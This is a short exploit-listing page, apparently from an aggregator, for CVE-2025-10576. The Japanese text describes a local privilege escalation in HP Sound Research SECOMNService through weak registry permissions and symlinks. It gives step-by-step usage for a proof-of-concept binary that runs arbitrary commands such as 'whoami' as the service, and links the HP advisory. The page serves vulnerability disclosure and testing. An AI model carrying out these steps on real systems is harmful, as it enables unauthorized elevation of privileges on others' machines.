Sploitus

Exploit for CVE-2025-10576

kitploit · 2026-09-02

Exploit Code

MARKDOWN18 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-R41N3RZUF477-CVE-2025-10576
# CVE-2025-10576

HP Sound Research SECOMNService の権限昇格。レジストリの権限が弱いため、任意のユーザーがレジストリシンボリックリンクを作成し、SECOMNService サービスに任意のレジストリキーを作成させることができます。

**手順:**

root@kitploit:~
    
    
    1. soundresearch_poc.exe prepare
    2. SECOMNService またはマシンを再起動する
    3. soundresearch_poc.exe exploit "whoami /all > C:\Windows\soundresearch.txt"
    4. soundresearch_poc.exe exploit "*another command*"
    5. soundresearch_poc.exe cleanup
    

参考: https://support.hp.com/us-en/document/ish_13092608-13092602-16/hpsbhf04051